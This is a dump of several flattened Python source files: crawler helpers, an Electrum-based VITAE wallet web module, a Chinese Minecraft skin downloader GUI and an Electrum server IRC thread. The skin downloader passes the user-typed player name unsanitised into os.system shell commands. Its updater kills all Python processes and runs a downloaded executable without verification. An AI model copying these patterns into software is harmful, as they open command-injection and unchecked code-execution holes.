rlcompleter readline.set_completer(rlcompleter.Completer(namespace).complete) readline.parse_and_bind("tab: complete") except ImportError: pass import code shell = code.InteractiveConsole(namespace) shell._quit = False def exit(): shell._quit = True def readfunc(prompt=""): if shell._quit: raise EOFError return six.moves.input(prompt) # inject exit method shell.ask_exit = exit shell.raw_input = readfunc return shell def python_console(namespace=None): """Start a interactive python console with caller's stack""" if namespace is None: import inspect frame = inspect.currentframe() caller = frame.f_back if not caller: logging.error("can't find caller who start this console.") caller = frame namespace = dict(caller.f_globals) namespace.update(caller.f_locals) return get_python_console(namespace=namespace).interact() def check_port_open(port, addr='127.0.0.1'): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((addr, port)) if result == 0: return True else: return False def get_xpath(node): assert isinstance(node, HtmlElement) or isinstance(node, PyQuery), 'type is error' node = node[0] if isinstance(node, PyQuery) else node return '//%s'%(node.getroottree().getelementpath(node)) def get_tag_name(node): return re.search('<[a-zA-Z][\s\>]', node.outerHtml()).group()[1:-1].lower() def matchcase(word): def replace(m): text = m.group() if text.isupper(): return word.upper() elif text.islower(): return word.lower() elif text[0].isupper(): return word.capitalize() else: return word return replace def get_db(db_str): db_obj = ObjectDict({}) db_obj.update({'db': Get(lambda: connect_database(db_str))}) return db_obj.db def is_all_url_exists(response, url_list): task_db = get_db(response.config['taskdb']) result_db = get_db(response.config['resultdb']) all_exists = True for index in range(len(url_list)-1, -1, -1): group = response.group if response.group else 'self_crawler' if not task_db.get_task(response.project, md5string(url_list[index])) and not [result for result in result_db.select(response.project, group, taskid=md5string(url_list[index]), fields=['taskid'])]: all_exists = False continue url_list.pop(index) return all_exists def is_need_to_paging(response, url_list): all_exists = is_all_url_exists(response, url_list) logging.info("is_need_to_paging projcect=%s, all_exists=%s, sequence=%s, can_page_num=%s"%(response.project, all_exists, response.sequence, response.page_num)) if response.page_num is not None and int(response.page_num) == 0: return False if response.sequence: return True return not all_exists def get_host_ip(): """ 查询本机ip地址 :return: """ try: s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.connect(('8.8.8.8',80)) ip=s.getsockname()[0] finally: s.close() return ip
web.py
# Electrum - lightweight Bitcoin client # Copyright (C) 2011 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal import os import re import shutil import threading import urllib from .address import Address from . import bitcoin from . import networks from .util import format_satoshis_plain, bh2u, print_error DEFAULT_EXPLORER = "exploredvt.com" mainnet_block_explorers = { 'exploredvt.com': ('https://exploredvt.com/#/VITAE/mainnet', Address.FMT_CASHADDR, {'tx': 'tx', 'addr': 'address', 'block' : 'block'}), } DEFAULT_EXPLORER_TESTNET = 'exploredvt.com' testnet_block_explorers = { 'exploredvt.com' : ('https://exploredvt.com/#/VITAE/testnet', Address.FMT_CASHADDR, {'tx': 'tx', 'addr': 'address', 'block' : 'block'}), } def BE_info(): if networks.net.TESTNET: return testnet_block_explorers return mainnet_block_explorers def BE_tuple(config): infodict = BE_info() return (infodict.get(BE_from_config(config)) or infodict.get(BE_default_explorer()) # In case block explorer in config is bad/no longer valid ) def BE_default_explorer(): return (DEFAULT_EXPLORER if not networks.net.TESTNET else DEFAULT_EXPLORER_TESTNET) def BE_from_config(config): return config.get('block_explorer', BE_default_explorer()) def BE_URL(config, kind, item): be_tuple = BE_tuple(config) if not be_tuple: return url_base, addr_fmt, parts = be_tuple kind_str = parts.get(kind) if kind_str is None: return if kind == 'addr': assert isinstance(item, Address) item = item.to_string(addr_fmt) return "/".join(part for part in (url_base, kind_str, item) if part) def BE_sorted_list(): return sorted(BE_info()) def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None): if not isinstance(addr, Address): return "" if op_return is not None and op_return_raw is not None: raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to create_URI') scheme, path = addr.to_URI_components() query = [] if amount: query.append('amount=%s'%format_satoshis_plain(amount)) if message: query.append('message=%s'%urllib.parse.quote(message)) if op_return: query.append(f'op_return={str(op_return)}') if op_return_raw: query.append(f'op_return_raw={str(op_return_raw)}') p = urllib.parse.ParseResult(scheme=scheme, netloc='', path=path, params='', query='&'.join(query), fragment='') return urllib.parse.urlunparse(p) def urlencode(s): ''' URL Encode; encodes a url or a uri fragment by %-quoting special chars''' return urllib.parse.quote(s) def urldecode(url): ''' Inverse of urlencode ''' return urllib.parse.unquote(url) def parse_URI(uri, on_pr=None): if ':' not in uri: # Test it's valid Address.from_string(uri) return {'address': uri} u = urllib.parse.urlparse(uri) # The scheme always comes back in lower case accept_schemes = parseable_schemes(net=net) if u.scheme not in accept_schemes: raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes))) address = u.path # python for android fails to parse query if address.find('?') > 0: address, query = u.path.split('?') pq = urllib.parse.parse_qs(query, keep_blank_values=True) else: pq = urllib.parse.parse_qs(u.query, keep_blank_values=True) for k, v in pq.items(): if len(v)!=1: raise Exception('Duplicate Key', k) out = {k: v[0] for k, v in pq.items()} if address: Address.from_string(address) out['address'] = address if 'amount' in out: am = out['amount'] m = re.match(r'([0-9\.]+)X([0-9])', am) if m: k = int(m.group(2)) - 8 amount = PyDecimal(m.group(1)) * pow(10, k) else: amount = PyDecimal(am) * bitcoin.COIN out['amount'] = int(amount) if 'message' in out: out['message'] = out['message'] out['memo'] = out['message'] if 'time' in out: out['time'] = int(out['time']) if 'exp' in out: out['exp'] = int(out['exp']) if 'sig' in out: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58)) if 'op_return_raw' in out and 'op_return' in out: del out['op_return_raw'] # allow only 1 of these r = out.get('r') sig = out.get('sig') name = out.get('name') if on_pr and (r or (name and sig)): def get_payment_request_thread(): from . import paymentrequest as pr if name and sig: s = pr.serialize_request(out).SerializeToString() request = pr.PaymentRequest(s) else: request = pr.get_payment_request(r) if on_pr: on_pr(request) t = threading.Thread(target=get_payment_request_thread) t.setDaemon(True) t.start() return out def check_www_dir(rdir): if not os.path.exists(rdir): os.mkdir(rdir) index = os.path.join(rdir, 'index.html') if not os.path.exists(index): print_error("copying index.html") src = os.path.join(os.path.dirname(__file__), 'www', 'index.html') shutil.copy(src, index) files = [ "https://code.jquery.com/jquery-1.9.1.min.js", "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js", "https://code.jquery.com/ui/1.10.3/jquery-ui.js", "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" ] for URL in files: path = urllib.parse.urlsplit(URL).path filename = os.path.basename(path) path = os.path.join(rdir, filename) if not os.path.exists(path): print_error("downloading ", URL) urllib.request.urlretrieve(URL, path)
MinecraftSkinDownloader_ttkthemes.py
''' 作品名:MinecraftSkinDownloader Github仓库地址:https://github.com/NewbieXvwu/MinecraftSkinDownloader Gitee仓库地址:https://gitee.com/NewbieXvwu/MinecraftSkinDownloader 关于本程序:这是一个可以简单地下载任何Minecraft正版玩家的皮肤的软件,使用Python编写,由NewbieXvwu维护。 作者:NewbieXvwu ''' version_int=2.4#程序主版本号 ispreview=False#程序是否是预览版 previewversion="0"#预览版本号(不自动更新) if ispreview:#生成字符串版的版本号 version="v"+str(version_int)+" Preview "+previewversion else: version="v"+str(version_int) #导入本地库(有些没用到,屎山懒得翻了) from copyreg import clear_extension_cache import ctypes, sys import os import json import base64 import tkinter from urllib.request import urlretrieve import zipfile import shutil from tkinter import messagebox import threading import platform import ctypes import time import winreg global ThreadShouldStop ThreadShouldStop=False def on_closing(): tkinter.messagebox.showerror("错误","正在安装必要的运行库!\n强制退出会造成运行库损坏!") #尝试安装并导入第三方库 try: import requests except:#没有安装requests from tkinter import * import tkinter from tkinter.ttk import * def sc_main_(): sc_=Tk() #窗口居中 scw=sc_.winfo_screenwidth() sch=sc_.winfo_screenheight() w=300 h=200 x=(scw-w)/2 y=(sch-h)/2 sc_.title("正在安装运行库") sc_.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc_.maxsize(w,h) sc_.minsize(w,h) try:#从双源尝试下载Logo sc_.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc_.tk.call('tk', 'scaling', ScaleFactor/75) except: pass def showmain(): while True: for i in range(100): try: # 每次更新加1 pb_['value'] = i + 1 # 更新画面 sc_.update() time.sleep(0.05) except: exit() for i in range(100): try: # 每次更新减1 pb_['value'] = 100 - i # 更新画面 sc_.update() time.sleep(0.05) except: exit() def ThreadStop(): while True: try: if ThreadShouldStop: #sc_.destroy() os.system("taskkill -f -im python.exe") os.system("taskkill -f -im pythonw.exe") os.system("taskkill -f -im py.exe") os.system("taskkill -f -im pyw.exe") except: pass time.sleep(0.1) run___=threading.Thread(target=ThreadStop) run___.daemon=True run___.start() def show():#多线程运行主函数,防止主线程GUI卡死 run__=threading.Thread(target=showmain) run__.start() lb1_=Label(sc_,text="正在安装程序必要的运行库……",font=("宋体",13)) lb1_.place(x=30,y=30) lb2_=Label(sc_,text=" 正在安装:requests\n\n安装完毕后请手动重启程序",font=("宋体",10)) lb2_.place(x=150,y=90,anchor="center") pb_=Progressbar(sc_,length=240,mode='indeterminate',orient=tkinter.HORIZONTAL) pb_.place(x=30,y=130) show() sc_.protocol('WM_DELETE_WINDOW', on_closing) sc_.mainloop() run___=threading.Thread(target=sc_main_) run___.start() result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple requests").read() if "Successfully installed" in result:#安装requests成功 import requests from requests import delete ThreadShouldStop=True else:#安装requests失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() try: import ttkthemes except:#没有安装ttkthemes result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple ttkthemes").read() if "Successfully installed" in result:#安装ttkthemes成功 import ttkthemes ThreadShouldStop=True else:#安装ttkthemes失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() else:#安装了requests try: import ttkthemes except:#没有安装ttkthemes from tkinter import * import tkinter from tkinter.ttk import * def sc_main_(): sc_=Tk() #窗口居中 scw=sc_.winfo_screenwidth() sch=sc_.winfo_screenheight() w=300 h=200 x=(scw-w)/2 y=(sch-h)/2 sc_.title("正在安装运行库") sc_.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc_.maxsize(w,h) sc_.minsize(w,h) try:#从双源尝试下载Logo sc_.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc_.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc_.tk.call('tk', 'scaling', ScaleFactor/75) except: pass def showmain(): while True: for i in range(100): try: # 每次更新加1 pb_['value'] = i + 1 # 更新画面 sc_.update() time.sleep(0.05) except: exit() for i in range(100): try: # 每次更新减1 pb_['value'] = 100 - i # 更新画面 sc_.update() time.sleep(0.05) except: exit() def ThreadStop(): while True: try: if ThreadShouldStop: #sc_.destroy() os.system("taskkill -f -im python.exe") os.system("taskkill -f -im pythonw.exe") os.system("taskkill -f -im py.exe") os.system("taskkill -f -im pyw.exe") except: pass time.sleep(0.1) run___=threading.Thread(target=ThreadStop) run___.start() def show():#多线程运行主函数,防止主线程GUI卡死 run__=threading.Thread(target=showmain) run__.start() lb1_=Label(sc_,text="正在安装程序必要的运行库……",font=("宋体",13)) lb1_.place(x=30,y=30) lb2_=Label(sc_,text=" 正在安装:ttkthemes\n\n安装完毕后请手动重启程序",font=("宋体",10)) lb2_.place(x=150,y=90,anchor="center") pb_=Progressbar(sc_,length=240,mode='indeterminate',orient=tkinter.HORIZONTAL) pb_.place(x=30,y=130) show() sc_.protocol('WM_DELETE_WINDOW', on_closing) sc_.mainloop() run___=threading.Thread(target=sc_main_) run___.daemon=True run___.start() result=os.popen("pip install -i https://pypi.tuna.tsinghua.edu.cn/simple ttkthemes").read() if "Successfully installed" in result:#安装ttkthemes成功 import ttkthemes ThreadShouldStop=True else:#安装ttkthemes失败 if tkinter.messagebox.askyesno("错误","运行库安装失败,程序无法继续运行!\n请把以下内容提交给开发者:\n"+result+"\n是否要提交错误?"):os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/issues/new?assignees=&labels=bug&template=bug_report.yml&title=%5B%E6%BC%8F%E6%B4%9E%5D+%E6%97%A0%E6%B3%95%E5%AE%89%E8%A3%85%E4%BE%9D%E8%B5%96%E5%BA%93") exit() #定义函数 def getzbmain():#主函数 id_=e.get() if id_=="": tkinter.messagebox.showerror(title='错误', message='请填写内容!') else: zt.set("状态:正在向Mojang请求玩家的UUID……") url1="https://api.mojang.com/users/profiles/minecraft/"+id_ r = requests.get(url1) del url1 status_code=r.status_code if not status_code==200: zt.set("状态:Bugjump出现错误,请检查你的输入!") del status_code zt.set("状态:读取UUID中……") r=r.text r=json.loads(r) try: uuid=r['id'] except: zt.set("状态:Bugjump出现错误,请检查你的输入!") del r zt.set("状态:向Mojang请求下载皮肤的地址中……") url2="https://sessionserver.mojang.com/session/minecraft/profile/"+uuid r = requests.get(url2) del url2 status_code=r.status_code if not status_code==200: zt.set("状态:Bugjump出现错误,请检查你的输入!") del status_code zt.set("状态:读取皮肤下载地址中……") r=r.text r=json.loads(r) properties=r["properties"] del r properties=properties[0] properties=properties["value"] zt.set("状态:解码皮肤下载地址中……") properties=base64.b64decode(properties) properties=properties.decode() properties=json.loads(properties) url3=properties["textures"] del properties havecape=False try: cape=url3["CAPE"] cape=cape["url"] filename=id_+'_cape.png' zt.set("状态:成功获取披风下载直链,正在尝试下载……") urlretrieve(cape,filename) havecape=True except: pass url3=url3["SKIN"] try: isalex=url3["metadata"] isalex=isalex["model"] except: isalex="" url3=url3["url"] filename=id_+'.png' zt.set("状态:成功获取皮肤下载直链,正在尝试下载……") urlretrieve(url3,filename) del url3 del filename if havecape: exit_=str(tkinter.messagebox.showwarning(title="下载完毕", message="下载完毕!此玩家还拥有披风,已同时下载!")) else: exit_=str(tkinter.messagebox.showwarning(title="下载完毕", message="下载完毕!")) zt.set("状态:待命") lb2.config(textvariable=zt) exit_=tkinter.messagebox.askyesno(title="下载完毕", message="下载完毕!按“确认”打包皮肤成材质包,或者按“取消”打开文件!") if exit_==True: try: file=".\\"+id_ shutil.rmtree(file) del file except: zt.set("状态:正在删除旧的临时目录……") zt.set("状态:正在创建新的临时目录……") lb2.config(textvariable=zt) file="./"+id_ os.mkdir(file) del file zt.set("状态:正在创建材质包说明文件……") lb2.config(textvariable=zt) filename = './'+id_+"/pack.mcmeta" mcmeta="{\"pack\":{\"pack_format\":7,\"description\":\"§c",id_,"\'s Skin Resourcepack\"}}" with open(filename, 'w') as file_object: file_object.write("{\"pack\":{\"pack_format\":4,\"description\":\"§cSkin Resourcepack\"}}") del filename del mcmeta zt.set("状态:正在下载材质包Logo……") lb2.config(textvariable=zt) url3="https://pic.downk.cc/item/5ff174673ffa7d37b35bb165.png" filename="./"+id_+"/pack.png" urlretrieve(url3,filename) del url3 del filename zt.set("状态:正在创建皮肤目录……") lb2.config(textvariable=zt) file="./"+id_+"/assets" os.mkdir(file) del file file="./"+id_+"/assets/minecraft" os.mkdir(file) del file file="./"+id_+"/assets/minecraft/textures" os.mkdir(file) del file file="./"+id_+"/assets/minecraft/textures/entity" os.mkdir(file) del file zt.set("状态:正在复制皮肤文件……") lb2.config(textvariable=zt) if isalex=="slim": cmd="copy "+id_+".png .\\"+id_+"\\assets\\minecraft\\textures\\entity\\alex.png" os.system(cmd) else: cmd="copy "+id_+".png .\\"+id_+"\\assets\\minecraft\\textures\\entity\\steve.png" os.system(cmd) del cmd zt.set("状态:正在压缩材质包……") lb2.config(textvariable=zt) shutil.make_archive("Skin_"+id_,'zip',id_) zt.set("状态:正在删除临时目录……") lb2.config(textvariable=zt) file=".\\"+id_ shutil.rmtree(file) del file zt.set("状态:待命") if os.path.exists(".\\.minecraft\\resourcepacks"): exit_=tkinter.messagebox.askyesno(title="创建材质包成功", message="成功创建材质包!\n注意:材质包会将游戏内的所有玩家的皮肤都替换成你想要的皮肤,可能会导致一些小问题!\n检测到程序目录下有Minecraft安装,如果要直接导入Minecraft,请按下“确认”,否则请按下“取消”打开材质包。") if exit_==True: cmd="copy Skin_"+id_+".zip .\\.minecraft\\resourcepacks\\"+id_+".zip" os.system(cmd) del cmd exit_=tkinter.messagebox.askyesno(title="导入成功", message="导入成功!\n是否要打开材质包文件夹?") if exit_==True: start="start \"\" .\\.minecraft\\resourcepacks\\" os.system(start) del exit_ else: start="start \"\" "+"\""+id_+'.zip'+"\"" os.system(start) else: exit_=tkinter.messagebox.askyesno(title="创建材质包成功", message="创建材质包成功!注意:材质包会将游戏内的所有玩家的皮肤都替换成你想要的皮肤,可能会导致一些小问题!\n是否要打开材质包?") if exit_==True: start="start \"\" "+"\"Skin_"+id_+'.zip'+"\"" os.system(start) del exit_ else: start=id_+'.png' os.startfile(start) def getzb(ev=None):#多线程运行主函数,防止主线程GUI卡死 run_=threading.Thread(target=getzbmain) run_.start() def info():#关于页面 def opengithub(): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader") def opengitee(): os.startfile("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader") def openbilibili(): os.startfile("https://space.bilibili.com/505201154") about=Toplevel() about.title("关于本程序") aboutscw=about.winfo_screenwidth() aboutsch=about.winfo_screenheight() aboutw=300 abouth=210 aboutx=(aboutscw-aboutw)/2 abouty=(aboutsch-abouth)/2 about.geometry("%dx%d+%d+%d"%(aboutw,abouth,aboutx,abouty)) about.iconbitmap('logo.ico') lb4=Label(about,text="关于本程序",font=("宋体",15)) lb4.place(x=100,y=30) lb5=Label(about,text="一个简单的Minecraft\n\n 正版皮肤下载器。",font=("宋体",15)) lb5.place(x=150,y=100,anchor=CENTER) btn3=Button(about,text="Github",command=opengithub) btn3.place(x=200,y=155) btn4=Button(about,text="Gitee",command=opengitee) btn4.place(x=102.5,y=155) btn5=Button(about,text="Bilibili",command=openbilibili) btn5.place(x=5,y=155) def TryUpdate(update_url):#尝试更新 update=requests.get(update_url) update=update.text update=json.loads(update) if float(update["tag_name"])>version_int: assets=update["assets"] browser_download_url_list=assets[0] browser_download_url=browser_download_url_list["browser_download_url"] is_update=tkinter.messagebox.askyesno(title="检测到新版本", message="本程序有新版本!是否要下载?") if is_update==True: def autoupdate(): btn1.config(state=DISABLED) btn1.config(text="更新中……") zt.set("状态:更新中,请稍候……") fn=os.path.splitext(os.path.basename(__file__))[0]+os.path.splitext(os.path.basename(__file__))[1] with open("Update.bat", 'w') as file_object: file_object.write("@echo off\ntaskkill -f -im python.exe\ntaskkill -f -im pythonw.exe\ntaskkill -f -im "+fn+"\ndel /s /q /f "+fn+"\nren New_MinecraftSkinDownloader.exe "+fn+"\nstart "+fn) urlretrieve(browser_download_url,"New_MinecraftSkinDownloader.exe") os.startfile("Update.bat") exit() run_1=threading.Thread(target=autoupdate) run_1.start() del update from tkinter import * from ttkthemes import * from tkinter.ttk import * #sc=ThemedTk(theme="equilux", toplevel=True, themebg=True) sc=ThemedTk(theme="arc", toplevel=True, themebg=True)#使用ttkthemes的修改版Tk() #窗口居中 scw=sc.winfo_screenwidth() sch=sc.winfo_screenheight() w=500 h=300 x=(scw-w)/2 y=(sch-h)/2 sc.title("Minecraft正版皮肤下载器"+version+" By 萌新欻無") sc.geometry("%dx%d+%d+%d"%(w,h,x,y)) sc.maxsize(w,h) sc.minsize(w,h) try:#从双源尝试下载Logo sc.iconbitmap('logo.ico') except: try: urlretrieve("https://gitee.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc.iconbitmap('logo.ico') except: urlretrieve("https://github.com/NewbieXvwu/MinecraftSkinDownloader/raw/main/logo.ico","logo.ico") sc.iconbitmap('logo.ico') try: ctypes.windll.shcore.SetProcessDpiAwareness(1)#高DPI适配 ScaleFactor=ctypes.windll.shcore.GetScaleFactorForDevice(0) sc.tk.call('tk', 'scaling', ScaleFactor/75) except: pass #主屏幕组件初始化 lb1=Label(sc,text="请输入Minecraft正版账号名称",font=("宋体",15)) lb1.place(x=110,y=50) e=Entry(sc,width=20) e.place(x=170,y=120) e.bind("<Return>",getzb) btn1=Button(sc,text="点击获取",command=getzb) btn1.place(x=195,y=190) zt=tkinter.StringVar() zt.set("状态:待命") lb2=Label(sc,textvariable=zt,font=("宋体",15)) lb2.place(x=10,y=270) cmb = Combobox(sc,width=7) cmb.place(x=420,y=5) ms=("浅色模式","深色模式") cmb["value"]=ms cmb.current(0) def func(event): if cmb.get()==ms[0]: sc.set_theme("arc") elif cmb.get()==ms[1]: sc.set_theme("equilux") cmb.bind("<<ComboboxSelected>>",func) try:#读取Windows 10深色模式 key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize") try: i = 0 while True: #EnumValue方法用来枚举键值,EnumKey用来枚举子键 name,value,type=winreg.EnumValue(key,i) if str(name)=="AppsUseLightTheme": break i +=1 if value==0: sc.set_theme("equilux") cmb.current(1) else: sc.set_theme("arc") cmb.current(0) except WindowsError: pass except: pass btn2=Button(sc,text="关于",command=info) btn2.place(x=400,y=260) lb3=Label(sc,text=version,font=("宋体",10)) lb3.place(x=5,y=5) if float(str(platform.version().split(".")[0])+"."+str(platform.version().split(".")[1]))>6.3 and int(platform.python_version().split(".")[1])<=8: if tkinter.messagebox.askyesno(title="您正在使用过旧的Python", message="您的操作系统为Windows "+str(platform.version().split(".")[0])+",\n但本程序正运行在版本为"+platform.python_version()+"的Python上。\n这可能是因为您下载了本程序的Windows 7兼容版。\n使用兼容版将会导致程序的稳定性无法得到保证,因为本程序的开发使用了更新的Python版本。\n您是否要下载一个稳定性更好的版本?"): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/releases") exit() if ispreview:#预览版警告 if not tkinter.messagebox.askyesno(title="您正在使用预览版", message="您正在使用的版本为"+version+",这是一个预览版。\n使用预览版可能会带来一些不可预知的问题!\n您是否要继续?"): os.startfile("https://github.com/NewbieXvwu/MinecraftSkinDownloader/releases") exit() try: TryUpdate("https://gitee.com/api/v5/repos/NewbieXvwu/MinecraftSkinDownloader/releases/latest") except: try: TryUpdate("https://api.github.com/repos/NewbieXvwu/MinecraftSkinDownloader/releases/lates") except: pass sc.mainloop()
ircthread.py
#!/usr/bin/env python # Copyright(C) 2011-2016 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import re import time import socket import ssl import threading import Queue import irc.client from utils import logger from utils import Hash from version import VERSION out_msg = [] class IrcThread(threading.Thread): def __init__(self, processor, config): threading.Thread.__init__(self) self.processor = processor self.daemon = True options = dict(config.items('server')) self.stratum_tcp_port = options.get('stratum_tcp_port') self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port') self.report_stratum_tcp_port = options.get('report_stratum_tcp_port') self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port') self.irc_bind_ip = options.get('irc_bind_ip') self.host = options.get('host') self.report_host = options.get('report_host') self.nick = options.get('irc_nick') if self.report_stratum_tcp_port: self.stratum_tcp_port = self.report_stratum_tcp_port if self.report_stratum_tcp_ssl_port: self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port if self.report_host: self.host = self.report_host if not self.nick: self.nick = Hash(self.host)[:5].encode("hex") self.pruning = True self.pruning_limit = config.get('leveldb', 'pruning_limit') self.nick = 'EY_' + self.nick self.password = None self.who_queue = Queue.Queue() def getname(self): s = 'v' + VERSION + ' ' if self.pruning: s += 'p' + self.pruning_limit + ' ' def add_port(letter, number): DEFAULT_PORTS = {'t':'50001', 's':'50002'} if not number: return '' if DEFAULT_PORTS[letter] == number: return letter + ' ' else: return letter + number + ' ' s += add_port('t',self.stratum_tcp_port) s += add_port('s',self.stratum_tcp_ssl_port) return s def start(self, queue): self.queue = queue threading.Thread.start(self) def on_connect(self, connection, event): connection.join("#electrum-yac") def on_join(self, connection, event): m = re.match("(EY_.*)!", event.source) if m: self.who_queue.put((connection, m.group(1))) def on_quit(self, connection, event): m = re.match("(EY_.*)!", event.source) if m: self.queue.put(('quit', [m.group(1)])) def on_kick(self, connection, event): m = re.match("(EY_.*)", event.arguments[0]) if m: self.queue.put(('quit', [m.group(1)])) def on_disconnect(self, connection, event): logger.error("irc: disconnected") raise BaseException("disconnected") def on_who(self, connection, event): line = str(event.arguments[6]).split() try: ip = socket.gethostbyname(line[1]) except: # no IPv4 address could be resolved. Could be .onion or IPv6. ip = line[1] nick = event.arguments[4] host = line[1] ports = line[2:] self.queue.put(('join', [nick, ip, host, ports])) def on_name(self, connection, event): for s in event.arguments[2].split(): if s.startswith("EY_"): self.who_queue.put((connection, s)) def who_thread(self): while not self.processor.shared.stopped(): try: connection, s = self.who_queue.get(timeout=1) except Queue.Empty: continue #logger.info("who: "+ s) connection.who(s) time.sleep(1) def run(self): while self.processor.shared.paused(): time.sleep(1) self.ircname = self.host + ' ' + self.getname() # avoid UnicodeDecodeError using LenientDecodingLineBuffer irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer logger.info("joining IRC") t = threading.Thread(target=self.who_thread) t.start() while not self.processor.shared.stopped(): client = irc.client.Reactor() try: #bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None #ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address) #c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory) c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname) except irc.client.ServerConnectionError: logger.error('irc', exc_info=True) time.sleep(10) continue c.add_global_handler("welcome", self.on_connect) c.add_global_handler("join", self.on_join) c.add_global_handler("quit", self.on_quit) c.add_global_handler("kick", self.on_kick) c.add_global_handler("whoreply", self.on_who) c.add_global_handler("namreply", self.on_name) c.add_global_handler("disconnect", self.on_disconnect) c.set_keepalive(60) self.connection = c try: client.process_forever() except BaseException as e: logger.error('irc', exc_info=True) time.sleep(10) continue logger.info("quitting IRC")
file_server.py
